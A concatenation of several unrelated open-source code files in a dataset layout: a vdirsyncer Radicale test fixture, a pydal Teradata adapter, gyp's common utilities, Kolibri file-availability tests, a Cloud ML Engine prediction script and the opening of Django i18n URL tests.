tribut/vdirsyncer | tests/storage/dav/servers/radicale/__init__.py | 1 | 3970 | # -*- coding: utf-8 -*-
import os
import sys
import pytest
from vdirsyncer.utils.compat import urlquote
import wsgi_intercept
import wsgi_intercept.requests_intercept
RADICALE_SCHEMA = '''
create table collection (
path varchar(200) not null,
parent_path varchar(200) references collection (path),
primary key (path));
create table item (
name varchar(200) not null,
tag text not null,
collection_path varchar(200) references collection (path),
primary key (name));
create table header (
name varchar(200) not null,
value text not null,
collection_path varchar(200) references collection (path),
primary key (name, collection_path));
create table line (
name text not null,
value text not null,
item_name varchar(200) references item (name),
timestamp bigint not null,
primary key (timestamp));
create table property (
name varchar(200) not null,
value text not null,
collection_path varchar(200) references collection (path),
primary key (name, collection_path));
'''.split(';')
storage_backend = os.environ.get('RADICALE_BACKEND', '') or 'filesystem'
def do_the_radicale_dance(tmpdir):
# All of radicale is already global state, the cleanliness of the code and
# all hope is already lost. This function runs before every test.
# This wipes out the radicale modules, to reset all of its state.
for module in list(sys.modules):
if module.startswith('radicale'):
del sys.modules[module]
# radicale.config looks for this envvar. We have to delete it before it
# tries to load a config file.
os.environ['RADICALE_CONFIG'] = ''
import radicale.config
# Now we can set some basic configuration.
# Radicale <=0.7 doesn't work with this, therefore we just catch the
# exception and assume Radicale is open for everyone.
try:
radicale.config.set('rights', 'type', 'owner_only')
radicale.config.set('auth', 'type', 'http')
import radicale.auth.http
def is_authenticated(user, password):
return user == 'bob' and password == 'bob'
radicale.auth.http.is_authenticated = is_authenticated
except Exception as e:
print(e)
if storage_backend in ('filesystem', 'multifilesystem'):
radicale.config.set('storage', 'type', storage_backend)
radicale.config.set('storage', 'filesystem_folder', tmpdir)
elif storage_backend == 'database':
radicale.config.set('storage', 'type', 'database')
radicale.config.set('storage', 'database_url', 'sqlite://')
from radicale.storage import database
s = database.Session()
for line in RADICALE_SCHEMA:
s.execute(line)
s.commit()
else:
raise RuntimeError(storage_backend)
class ServerMixin(object):
@pytest.fixture(autouse=True)
def setup(self, request, tmpdir):
do_the_radicale_dance(str(tmpdir))
from radicale import Application
wsgi_intercept.requests_intercept.install()
wsgi_intercept.add_wsgi_intercept('127.0.0.1', 80, Application)
def teardown():
wsgi_intercept.remove_wsgi_intercept('127.0.0.1', 80)
wsgi_intercept.requests_intercept.uninstall()
request.addfinalizer(teardown)
@pytest.fixture
def get_storage_args(self, get_item):
def inner(collection='test'):
url = 'http://127.0.0.1/bob/'
if collection is not None:
collection += self.storage_class.fileext
url = url.rstrip('/') + '/' + urlquote(collection)
rv = {'url': url, 'username': 'bob', 'password': 'bob',
'collection': collection}
if collection is not None:
s = self.storage_class(**rv)
s.delete(*s.upload(get_item()))
return rv
return inner
| mit |
aayush2911/Fibonaccio | web2py/gluon/packages/dal/pydal/adapters/teradata.py | 22 | 2850 | # -*- coding: utf-8 -*-
from .._globals import IDENTITY
from ..connection import ConnectionPool
from .base import BaseAdapter
class TeradataAdapter(BaseAdapter):
drivers = ('pyodbc',)
types = {
'boolean': 'CHAR(1)',
'string': 'VARCHAR(%(length)s)',
'text': 'VARCHAR(2000)',
'json': 'VARCHAR(4000)',
'password': 'VARCHAR(%(length)s)',
'blob': 'BLOB',
'upload': 'VARCHAR(%(length)s)',
'integer': 'INT',
'bigint': 'BIGINT',
'float': 'REAL',
'double': 'DOUBLE',
'decimal': 'NUMERIC(%(precision)s,%(scale)s)',
'date': 'DATE',
'time': 'TIME',
'datetime': 'TIMESTAMP',
# Modified Constraint syntax for Teradata.
# Teradata does not support ON DELETE.
'id': 'INT GENERATED ALWAYS AS IDENTITY', # Teradata Specific
'reference': 'INT',
'list:integer': 'VARCHAR(4000)',
'list:string': 'VARCHAR(4000)',
'list:reference': 'VARCHAR(4000)',
'geometry': 'ST_GEOMETRY',
'big-id': 'BIGINT GENERATED ALWAYS AS IDENTITY', # Teradata Specific
'big-reference': 'BIGINT',
'reference FK': ' REFERENCES %(foreign_key)s',
'reference TFK': ' FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_table)s (%(foreign_key)s)',
}
def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8',
credential_decoder=IDENTITY, driver_args={},
adapter_args={}, do_connect=True, after_connection=None):
self.db = db
self.dbengine = "teradata"
self.uri = uri
if do_connect: self.find_driver(adapter_args,uri)
self.pool_size = pool_size
self.folder = folder
self.db_codec = db_codec
self._after_connection = after_connection
self.find_or_make_work_folder()
ruri = uri.split('://', 1)[1]
def connector(cnxn=ruri,driver_args=driver_args):
return self.driver.connect(cnxn,**driver_args)
self.connector = connector
if do_connect: self.reconnect()
def close(self,action='commit',really=True):
# Teradata does not implicitly close off the cursor
# leading to SQL_ACTIVE_STATEMENTS limit errors
self.cursor.close()
ConnectionPool.close(self, action, really)
def LEFT_JOIN(self):
return 'LEFT OUTER JOIN'
# Similar to MSSQL, Teradata can't specify a range (for Pageby)
def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby):
if limitby:
(lmin, lmax) = limitby
sql_s += ' TOP %i' % lmax
return 'SELECT %s %s FROM %s%s%s;' % (sql_s, sql_f, sql_t, sql_w, sql_o)
def _truncate(self, table, mode=''):
tablename = table._tablename
return ['DELETE FROM %s ALL;' % (tablename)]
| gpl-2.0 |
seann1/portfolio5 | .meteor/dev_bundle/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/common.py | 1292 | 20063 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import with_statement
import collections
import errno
import filecmp
import os.path
import re
import tempfile
import sys
# A minimal memoizing decorator. It'll blow up if the args aren't immutable,
# among other "problems".
class memoize(object):
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
result = self.func(*args)
self.cache[args] = result
return result
class GypError(Exception):
"""Error class representing an error, which is to be presented
to the user. The main entry point will catch and display this.
"""
pass
def ExceptionAppend(e, msg):
"""Append a message to the given exception's message."""
if not e.args:
e.args = (msg,)
elif len(e.args) == 1:
e.args = (str(e.args[0]) + ' ' + msg,)
else:
e.args = (str(e.args[0]) + ' ' + msg,) + e.args[1:]
def FindQualifiedTargets(target, qualified_list):
"""
Given a list of qualified targets, return the qualified targets for the
specified |target|.
"""
return [t for t in qualified_list if ParseQualifiedTarget(t)[1] == target]
def ParseQualifiedTarget(target):
# Splits a qualified target into a build file, target name and toolset.
# NOTE: rsplit is used to disambiguate the Windows drive letter separator.
target_split = target.rsplit(':', 1)
if len(target_split) == 2:
[build_file, target] = target_split
else:
build_file = None
target_split = target.rsplit('#', 1)
if len(target_split) == 2:
[target, toolset] = target_split
else:
toolset = None
return [build_file, target, toolset]
def ResolveTarget(build_file, target, toolset):
# This function resolves a target into a canonical form:
# - a fully defined build file, either absolute or relative to the current
# directory
# - a target name
# - a toolset
#
# build_file is the file relative to which 'target' is defined.
# target is the qualified target.
# toolset is the default toolset for that target.
[parsed_build_file, target, parsed_toolset] = ParseQualifiedTarget(target)
if parsed_build_file:
if build_file:
# If a relative path, parsed_build_file is relative to the directory
# containing build_file. If build_file is not in the current directory,
# parsed_build_file is not a usable path as-is. Resolve it by
# interpreting it as relative to build_file. If parsed_build_file is
# absolute, it is usable as a path regardless of the current directory,
# and os.path.join will return it as-is.
build_file = os.path.normpath(os.path.join(os.path.dirname(build_file),
parsed_build_file))
# Further (to handle cases like ../cwd), make it relative to cwd)
if not os.path.isabs(build_file):
build_file = RelativePath(build_file, '.')
else:
build_file = parsed_build_file
if parsed_toolset:
toolset = parsed_toolset
return [build_file, target, toolset]
def BuildFile(fully_qualified_target):
# Extracts the build file from the fully qualified target.
return ParseQualifiedTarget(fully_qualified_target)[0]
def GetEnvironFallback(var_list, default):
"""Look up a key in the environment, with fallback to secondary keys
and finally falling back to a default value."""
for var in var_list:
if var in os.environ:
return os.environ[var]
return default
def QualifiedTarget(build_file, target, toolset):
# "Qualified" means the file that a target was defined in and the target
# name, separated by a colon, suffixed by a # and the toolset name:
# /path/to/file.gyp:target_name#toolset
fully_qualified = build_file + ':' + target
if toolset:
fully_qualified = fully_qualified + '#' + toolset
return fully_qualified
@memoize
def RelativePath(path, relative_to, follow_path_symlink=True):
# Assuming both |path| and |relative_to| are relative to the current
# directory, returns a relative path that identifies path relative to
# relative_to.
# If |follow_symlink_path| is true (default) and |path| is a symlink, then
# this method returns a path to the real file represented by |path|. If it is
# false, this method returns a path to the symlink. If |path| is not a
# symlink, this option has no effect.
# Convert to normalized (and therefore absolute paths).
if follow_path_symlink:
path = os.path.realpath(path)
else:
path = os.path.abspath(path)
relative_to = os.path.realpath(relative_to)
# On Windows, we can't create a relative path to a different drive, so just
# use the absolute path.
if sys.platform == 'win32':
if (os.path.splitdrive(path)[0].lower() !=
os.path.splitdrive(relative_to)[0].lower()):
return path
# Split the paths into components.
path_split = path.split(os.path.sep)
relative_to_split = relative_to.split(os.path.sep)
# Determine how much of the prefix the two paths share.
prefix_len = len(os.path.commonprefix([path_split, relative_to_split]))
# Put enough ".." components to back up out of relative_to to the common
# prefix, and then append the part of path_split after the common prefix.
relative_split = [os.path.pardir] * (len(relative_to_split) - prefix_len) + \
path_split[prefix_len:]
if len(relative_split) == 0:
# The paths were the same.
return ''
# Turn it back into a string and we're done.
return os.path.join(*relative_split)
@memoize
def InvertRelativePath(path, toplevel_dir=None):
"""Given a path like foo/bar that is relative to toplevel_dir, return
the inverse relative path back to the toplevel_dir.
E.g. os.path.normpath(os.path.join(path, InvertRelativePath(path)))
should always produce the empty string, unless the path contains symlinks.
"""
if not path:
return path
toplevel_dir = '.' if toplevel_dir is None else toplevel_dir
return RelativePath(toplevel_dir, os.path.join(toplevel_dir, path))
def FixIfRelativePath(path, relative_to):
# Like RelativePath but returns |path| unchanged if it is absolute.
if os.path.isabs(path):
return path
return RelativePath(path, relative_to)
def UnrelativePath(path, relative_to):
# Assuming that |relative_to| is relative to the current directory, and |path|
# is a path relative to the dirname of |relative_to|, returns a path that
# identifies |path| relative to the current directory.
rel_dir = os.path.dirname(relative_to)
return os.path.normpath(os.path.join(rel_dir, path))
# re objects used by EncodePOSIXShellArgument. See IEEE 1003.1 XCU.2.2 at
# http://www.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_02
# and the documentation for various shells.
# _quote is a pattern that should match any argument that needs to be quoted
# with double-quotes by EncodePOSIXShellArgument. It matches the following
# characters appearing anywhere in an argument:
# \t, \n, space parameter separators
# # comments
# $ expansions (quoted to always expand within one argument)
# % called out by IEEE 1003.1 XCU.2.2
# & job control
# ' quoting
# (, ) subshell execution
# *, ?, [ pathname expansion
# ; command delimiter
# <, >, | redirection
# = assignment
# {, } brace expansion (bash)
# ~ tilde expansion
# It also matches the empty string, because "" (or '') is the only way to
# represent an empty string literal argument to a POSIX shell.
#
# This does not match the characters in _escape, because those need to be
# backslash-escaped regardless of whether they appear in a double-quoted
# string.
_quote = re.compile('[\t\n #$%&\'()*;<=>?[{|}~]|^$')
# _escape is a pattern that should match any character that needs to be
# escaped with a backslash, whether or not the argument matched the _quote
# pattern. _escape is used with re.sub to backslash anything in _escape's
# first match group, hence the (parentheses) in the regular expression.
#
# _escape matches the following characters appearing anywhere in an argument:
# " to prevent POSIX shells from interpreting this character for quoting
# \ to prevent POSIX shells from interpreting this character for escaping
# ` to prevent POSIX shells from interpreting this character for command
# substitution
# Missing from this list is $, because the desired behavior of
# EncodePOSIXShellArgument is to permit parameter (variable) expansion.
#
# Also missing from this list is !, which bash will interpret as the history
# expansion character when history is enabled. bash does not enable history
# by default in non-interactive shells, so this is not thought to be a problem.
# ! was omitted from this list because bash interprets "\!" as a literal string
# including the backslash character (avoiding history expansion but retaining
# the backslash), which would not be correct for argument encoding. Handling
# this case properly would also be problematic because bash allows the history
# character to be changed with the histchars shell variable. Fortunately,
# as history is not enabled in non-interactive shells and
# EncodePOSIXShellArgument is only expected to encode for non-interactive
# shells, there is no room for error here by ignoring !.
_escape = re.compile(r'(["\\`])')
def EncodePOSIXShellArgument(argument):
"""Encodes |argument| suitably for consumption by POSIX shells.
argument may be quoted and escaped as necessary to ensure that POSIX shells
treat the returned value as a literal representing the argument passed to
this function. Parameter (variable) expansions beginning with $ are allowed
to remain intact without escaping the $, to allow the argument to contain
references to variables to be expanded by the shell.
"""
if not isinstance(argument, str):
argument = str(argument)
if _quote.search(argument):
quote = '"'
else:
quote = ''
encoded = quote + re.sub(_escape, r'\\\1', argument) + quote
return encoded
def EncodePOSIXShellList(list):
"""Encodes |list| suitably for consumption by POSIX shells.
Returns EncodePOSIXShellArgument for each item in list, and joins them
together using the space character as an argument separator.
"""
encoded_arguments = []
for argument in list:
encoded_arguments.append(EncodePOSIXShellArgument(argument))
return ' '.join(encoded_arguments)
def DeepDependencyTargets(target_dicts, roots):
"""Returns the recursive list of target dependencies."""
dependencies = set()
pending = set(roots)
while pending:
# Pluck out one.
r = pending.pop()
# Skip if visited already.
if r in dependencies:
continue
# Add it.
dependencies.add(r)
# Add its children.
spec = target_dicts[r]
pending.update(set(spec.get('dependencies', [])))
pending.update(set(spec.get('dependencies_original', [])))
return list(dependencies - set(roots))
def BuildFileTargets(target_list, build_file):
"""From a target_list, returns the subset from the specified build_file.
"""
return [p for p in target_list if BuildFile(p) == build_file]
def AllTargets(target_list, target_dicts, build_file):
"""Returns all targets (direct and dependencies) for the specified build_file.
"""
bftargets = BuildFileTargets(target_list, build_file)
deptargets = DeepDependencyTargets(target_dicts, bftargets)
return bftargets + deptargets
def WriteOnDiff(filename):
"""Write to a file only if the new contents differ.
Arguments:
filename: name of the file to potentially write to.
Returns:
A file like object which will write to temporary file and only overwrite
the target if it differs (on close).
"""
class Writer(object):
"""Wrapper around file which only covers the target if it differs."""
def __init__(self):
# Pick temporary file.
tmp_fd, self.tmp_path = tempfile.mkstemp(
suffix='.tmp',
prefix=os.path.split(filename)[1] + '.gyp.',
dir=os.path.split(filename)[0])
try:
self.tmp_file = os.fdopen(tmp_fd, 'wb')
except Exception:
# Don't leave turds behind.
os.unlink(self.tmp_path)
raise
def __getattr__(self, attrname):
# Delegate everything else to self.tmp_file
return getattr(self.tmp_file, attrname)
def close(self):
try:
# Close tmp file.
self.tmp_file.close()
# Determine if different.
same = False
try:
same = filecmp.cmp(self.tmp_path, filename, False)
except OSError, e:
if e.errno != errno.ENOENT:
raise
if same:
# The new file is identical to the old one, just get rid of the new
# one.
os.unlink(self.tmp_path)
else:
# The new file is different from the old one, or there is no old one.
# Rename the new file to the permanent name.
#
# tempfile.mkstemp uses an overly restrictive mode, resulting in a
# file that can only be read by the owner, regardless of the umask.
# There's no reason to not respect the umask here, which means that
# an extra hoop is required to fetch it and reset the new file's mode.
#
# No way to get the umask without setting a new one? Set a safe one
# and then set it back to the old value.
umask = os.umask(077)
os.umask(umask)
os.chmod(self.tmp_path, 0666 & ~umask)
if sys.platform == 'win32' and os.path.exists(filename):
# NOTE: on windows (but not cygwin) rename will not replace an
# existing file, so it must be preceded with a remove. Sadly there
# is no way to make the switch atomic.
os.remove(filename)
os.rename(self.tmp_path, filename)
except Exception:
# Don't leave turds behind.
os.unlink(self.tmp_path)
raise
return Writer()
def EnsureDirExists(path):
"""Make sure the directory for |path| exists."""
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
def GetFlavor(params):
"""Returns |params.flavor| if it's set, the system's default flavor else."""
flavors = {
'cygwin': 'win',
'win32': 'win',
'darwin': 'mac',
}
if 'flavor' in params:
return params['flavor']
if sys.platform in flavors:
return flavors[sys.platform]
if sys.platform.startswith('sunos'):
return 'solaris'
if sys.platform.startswith('freebsd'):
return 'freebsd'
if sys.platform.startswith('openbsd'):
return 'openbsd'
if sys.platform.startswith('netbsd'):
return 'netbsd'
if sys.platform.startswith('aix'):
return 'aix'
return 'linux'
def CopyTool(flavor, out_path):
"""Finds (flock|mac|win)_tool.gyp in the gyp directory and copies it
to |out_path|."""
# aix and solaris just need flock emulation. mac and win use more complicated
# support scripts.
prefix = {
'aix': 'flock',
'solaris': 'flock',
'mac': 'mac',
'win': 'win'
}.get(flavor, None)
if not prefix:
return
# Slurp input file.
source_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '%s_tool.py' % prefix)
with open(source_path) as source_file:
source = source_file.readlines()
# Add header and write it out.
tool_path = os.path.join(out_path, 'gyp-%s-tool' % prefix)
with open(tool_path, 'w') as tool_file:
tool_file.write(
''.join([source[0], '# Generated by gyp. Do not edit.\n'] + source[1:]))
# Make file executable.
os.chmod(tool_path, 0755)
# From Alex Martelli,
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560
# ASPN: Python Cookbook: Remove duplicates from a sequence
# First comment, dated 2001/10/13.
# (Also in the printed Python Cookbook.)
def uniquer(seq, idfun=None):
if idfun is None:
idfun = lambda x: x
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen: continue
seen[marker] = 1
result.append(item)
return result
# Based on http://code.activestate.com/recipes/576694/.
class OrderedSet(collections.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[key] = [key, curr, end]
def discard(self, key):
if key in self.map:
key, prev_item, next_item = self.map.pop(key)
prev_item[2] = next_item
next_item[1] = prev_item
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
# The second argument is an addition that causes a pylint warning.
def pop(self, last=True): # pylint: disable=W0221
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)
# Extensions to the recipe.
def update(self, iterable):
for i in iterable:
if i not in self:
self.add(i)
class CycleError(Exception):
"""An exception raised when an unexpected cycle is detected."""
def __init__(self, nodes):
self.nodes = nodes
def __str__(self):
return 'CycleError: cycle involving: ' + str(self.nodes)
def TopologicallySorted(graph, get_edges):
r"""Topologically sort based on a user provided edge definition.
Args:
graph: A list of node names.
get_edges: A function mapping from node name to a hashable collection
of node names which this node has outgoing edges to.
Returns:
A list containing all of the node in graph in topological order.
It is assumed that calling get_edges once for each node and caching is
cheaper than repeatedly calling get_edges.
Raises:
CycleError in the event of a cycle.
Example:
graph = {'a': '$(b) $(c)', 'b': 'hi', 'c': '$(b)'}
def GetEdges(node):
return re.findall(r'\$\(([^))]\)', graph[node])
print TopologicallySorted(graph.keys(), GetEdges)
==>
['a', 'c', b']
"""
get_edges = memoize(get_edges)
visited = set()
visiting = set()
ordered_nodes = []
def Visit(node):
if node in visiting:
raise CycleError(visiting)
if node in visited:
return
visited.add(node)
visiting.add(node)
for neighbor in get_edges(node):
Visit(neighbor)
visiting.remove(node)
ordered_nodes.insert(0, node)
for node in sorted(graph):
Visit(node)
return ordered_nodes
def CrossCompileRequested():
# TODO: figure out how to not build extra host objects in the
# non-cross-compile case when this is enabled, and enable unconditionally.
return (os.environ.get('GYP_CROSSCOMPILE') or
os.environ.get('AR_host') or
os.environ.get('CC_host') or
os.environ.get('CXX_host') or
os.environ.get('AR_target') or
os.environ.get('CC_target') or
os.environ.get('CXX_target'))
| gpl-2.0 |
mrpau/kolibri | kolibri/core/content/test/test_file_availability.py | 3 | 7432 | import os
import shutil
import tempfile
import uuid
from collections import namedtuple
from django.test import TransactionTestCase
from mock import patch
from .sqlalchemytesting import django_connection_engine
from kolibri.core.content.models import LocalFile
from kolibri.core.content.utils.file_availability import (
get_available_checksums_from_disk,
)
from kolibri.core.content.utils.file_availability import (
get_available_checksums_from_remote,
)
from kolibri.core.discovery.models import NetworkLocation
from kolibri.core.utils.cache import process_cache
def get_engine(connection_string):
return django_connection_engine()
test_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
file_id_1 = "6bdfea4a01830fdd4a585181c0b8068c"
file_id_2 = "e00699f859624e0f875ac6fe1e13d648"
@patch("kolibri.core.content.utils.sqlalchemybridge.get_engine", new=get_engine)
class LocalFileByDisk(TransactionTestCase):
fixtures = ["content_test.json"]
def setUp(self):
super(LocalFileByDisk, self).setUp()
process_cache.clear()
self.mock_home_dir = tempfile.mkdtemp()
self.mock_storage_dir = os.path.join(self.mock_home_dir, "content", "storage")
os.makedirs(self.mock_storage_dir)
self.mock_drive_id = "123"
def createmock_content_file(self, prefix, suffix="mp4"):
second_dir = os.path.join(self.mock_storage_dir, prefix[0], prefix[1])
try:
os.makedirs(second_dir)
except OSError:
pass
open(os.path.join(second_dir, prefix + "." + suffix), "w+b")
def createmock_content_file1(self):
self.createmock_content_file(file_id_1, suffix="mp4")
def createmock_content_file2(self):
self.createmock_content_file(file_id_2, suffix="epub")
@patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
def test_set_one_file_in_channel(self, drive_mock):
DriveData = namedtuple("DriveData", ["id", "datafolder"])
drive_mock.return_value = DriveData(
id=self.mock_drive_id, datafolder=self.mock_home_dir
)
self.createmock_content_file1()
checksums = get_available_checksums_from_disk(
test_channel_id, self.mock_drive_id
)
self.assertEqual(checksums, set([file_id_1]))
@patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
def test_set_one_file_not_in_channel(self, drive_mock):
DriveData = namedtuple("DriveData", ["id", "datafolder"])
drive_mock.return_value = DriveData(
id=self.mock_drive_id, datafolder=self.mock_home_dir
)
self.createmock_content_file(uuid.uuid4().hex)
checksums = get_available_checksums_from_disk(
test_channel_id, self.mock_drive_id
)
self.assertEqual(checksums, set())
@patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
def test_set_two_files_in_channel(self, drive_mock):
DriveData = namedtuple("DriveData", ["id", "datafolder"])
drive_mock.return_value = DriveData(
id=self.mock_drive_id, datafolder=self.mock_home_dir
)
self.createmock_content_file1()
self.createmock_content_file2()
checksums = get_available_checksums_from_disk(
test_channel_id, self.mock_drive_id
)
self.assertEqual(checksums, set([file_id_1, file_id_2]))
@patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
def test_set_two_files_one_in_channel(self, drive_mock):
DriveData = namedtuple("DriveData", ["id", "datafolder"])
drive_mock.return_value = DriveData(
id=self.mock_drive_id, datafolder=self.mock_home_dir
)
self.createmock_content_file1()
self.createmock_content_file(uuid.uuid4().hex)
checksums = get_available_checksums_from_disk(
test_channel_id, self.mock_drive_id
)
self.assertEqual(checksums, set([file_id_1]))
@patch("kolibri.core.content.utils.file_availability.get_mounted_drive_by_id")
def test_set_two_files_none_in_channel(self, drive_mock):
DriveData = namedtuple("DriveData", ["id", "datafolder"])
drive_mock.return_value = DriveData(
id=self.mock_drive_id, datafolder=self.mock_home_dir
)
self.createmock_content_file(uuid.uuid4().hex)
self.createmock_content_file(uuid.uuid4().hex)
checksums = get_available_checksums_from_disk(
test_channel_id, self.mock_drive_id
)
self.assertEqual(checksums, set())
def tearDown(self):
shutil.rmtree(self.mock_home_dir)
super(LocalFileByDisk, self).tearDown()
local_file_qs = LocalFile.objects.filter(
files__contentnode__channel_id=test_channel_id, files__supplementary=False
).values_list("id", flat=True)
@patch("kolibri.core.content.utils.sqlalchemybridge.get_engine", new=get_engine)
class LocalFileRemote(TransactionTestCase):
fixtures = ["content_test.json"]
def setUp(self):
super(LocalFileRemote, self).setUp()
process_cache.clear()
self.location = NetworkLocation.objects.create(base_url="test")
@patch("kolibri.core.content.utils.file_availability.requests")
def test_set_one_file(self, requests_mock):
requests_mock.post.return_value.status_code = 200
requests_mock.post.return_value.content = "1"
checksums = get_available_checksums_from_remote(
test_channel_id, self.location.id
)
self.assertEqual(len(checksums), 1)
self.assertTrue(local_file_qs.filter(id=list(checksums)[0]).exists())
@patch("kolibri.core.content.utils.file_availability.requests")
def test_set_two_files_in_channel(self, requests_mock):
requests_mock.post.return_value.status_code = 200
requests_mock.post.return_value.content = "3"
checksums = get_available_checksums_from_remote(
test_channel_id, self.location.id
)
self.assertEqual(len(checksums), 2)
self.assertTrue(local_file_qs.filter(id=list(checksums)[0]).exists())
self.assertTrue(local_file_qs.filter(id=list(checksums)[1]).exists())
@patch("kolibri.core.content.utils.file_availability.requests")
def test_set_two_files_none_in_channel(self, requests_mock):
requests_mock.post.return_value.status_code = 200
requests_mock.post.return_value.content = "0"
checksums = get_available_checksums_from_remote(
test_channel_id, self.location.id
)
self.assertEqual(checksums, set())
@patch("kolibri.core.content.utils.file_availability.requests")
def test_404_remote_checksum_response(self, requests_mock):
requests_mock.post.return_value.status_code = 404
checksums = get_available_checksums_from_remote(
test_channel_id, self.location.id
)
self.assertIsNone(checksums)
@patch("kolibri.core.content.utils.file_availability.requests")
def test_invalid_integer_remote_checksum_response(self, requests_mock):
requests_mock.post.return_value.status_code = 200
requests_mock.post.return_value.content = "I am not a json, I am a free man!"
checksums = get_available_checksums_from_remote(
test_channel_id, self.location.id
)
self.assertIsNone(checksums)
| mit |
amygdala/tensorflow-workshop | workshop_sections/wide_n_deep/predict/predict_class.py | 1 | 2839 | from oauth2client.client import GoogleCredentials
from googleapiclient import discovery
from googleapiclient import errors
import json
class MLEngine:
def __init__(self, projectID='cloudml-demo', service='ml', version='v1'):
self.projectID = projectID
self.service=service
self.version=version
self.svc = self.make_svc()
def make_svc(self):
# Get application default credentials (possible only if the gcloud tool is
# configured on your machine).
# gcloud auth application-default login
credentials = GoogleCredentials.get_application_default()
# Build a representation of the Cloud ML API.
ml = discovery.build(self.service, self.version, credentials=credentials)
return ml
def models_list(self):
print('models.list')
request = self.svc.projects().models().list(
parent='projects/{}'.format(self.projectID)) #, body=requestDict)
# Make the call.
try:
response = request.execute()
print(response)
except errors.HttpError as err:
# Something went wrong, print out some information.
print('There was an error listing the model. Details:')
print(err._get_reason())
print(err)
def model_predict(self, model, version):
print('models.predict')
instances = []
model_id = 'projects/{}/models/{}/versions/{}'.format(self.projectID, model, version)
model_id = 'projects/{}/models/{}'.format(self.projectID, model)
print(model_id)
with open('test.json') as infile:
for line in infile:
instances.append(json.loads(line))
request_body = {'instances': instances}
request = self.svc.projects().predict(
# parent=self.projectID,
name=model_id,
body=request_body
) #, body=requestDict)
# Make the call.
try:
response = request.execute()
print(response)
except errors.HttpError as err:
# Something went wrong, print out some information.
print('There was an error listing the model. Details:')
print(err._get_reason())
print(err)
def make_models():
ml = MLEngine()
# ml.models_list()
ml.model_predict('cloudwnd', 'v1')
return
if __name__ == "__main__":
make_models()
# Create a dictionary with the fields from the request body.
# requestDict = {'name': 'api_model1', 'description': 'a model from the python api'}
# Create a request to call projects.models.list.
# request = ml.svc.projects().models().list(
# parent=ml.projectID) #, body=requestDict)
# # Make the call.
# try:
# response = request.execute()
# print(response)
# except errors.HttpError as err:
# # Something went wrong, print out some information.
# print('There was an error creating the model. Check the details:')
# print(err._get_reason())
# print(err)
| apache-2.0 |
fafaman/django | tests/i18n/patterns/tests.py | 256 | 14326 | from __future__ import unicode_literals
import os
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import clear_url_caches, reverse, translate_url
from django.http import HttpResponsePermanentRedirect
from django.middleware.locale import LocaleMiddleware
from django.template import Context, Template
from django.test import SimpleTestCase, override_settings
from django.test.utils import override_script_prefix
from django.utils import translation
from django.utils._os import upath
class PermanentRedirectLocaleMiddleWare(LocaleMiddleware):
response_redirect_class = HttpResponsePermanentRedirect
@override_settings(
USE_I18N=True,
LOCALE_PATHS=[
os.path.join(os.path.dirname(upath(__file__)), 'locale'),
],
LANGUAGE_CODE='en-us',
LANGUAGES=[
('nl', 'Dutch'),
('en', 'English'),
('pt-br', 'Brazilian Portuguese'),
],
MIDDLEWARE_CLASSES=[
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
],
ROOT_URLCONF='i18n.patterns.urls.default',
TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(os.path.dirname(upath(__file__)), 'templates')],
'OPTIONS': {
'context_processors': [
'django.template.context_processors.i18n',
],
},
}],
)
class URLTestCaseBase(SimpleTestCase):
"""
TestCase base-class for the URL tests.
"""
def setUp(self):
# Make sure the cache is empty before we are doing our tests.
clear_url_caches()
def tearDown(self):
# Make sure we will leave an empty cache for other testcases.
clear_url_caches()
class URLPrefixTests(URLTestCaseBase):
"""
Tests if the `i18n_patterns` is adding the prefix correctly.
"""
def test_not_prefixed(self):
with translation.override('en'):
self.assertEqual(reverse('not-prefixed'), '/not-prefixed/')
self.assertEqual(reverse('not-prefixed-included-url'), '/not-prefixed-include/foo/')
with translation.override('nl'):
self.assertEqual(reverse('not-prefixed'), '/not-prefixed/')
self.assertEqual(reverse('not-prefixed-included-url'), '/not-prefixed-include/foo/')
def test_prefixed(self):
with translation.override('en'):
self.assertEqual(reverse('prefixed'), '/en/prefixed/')
with translation.override('nl'):
self.assertEqual(reverse('prefixed'), '/nl/prefixed/')
@override_settings(ROOT_URLCONF='i18n.patterns.urls.wrong')
def test_invalid_prefix_use(self):
self.assertRaises(ImproperlyConfigured, lambda: reverse('account:register'))
@override_settings(ROOT_URLCONF='i18n.patterns.urls.disabled')
class URLDisabledTests(URLTestCaseBase):
@override_settings(USE_I18N=False)
def test_prefixed_i18n_disabled(self):
with translation.override('en'):
self.assertEqual(reverse('prefixed'), '/prefixed/')
with translation.override('nl'):
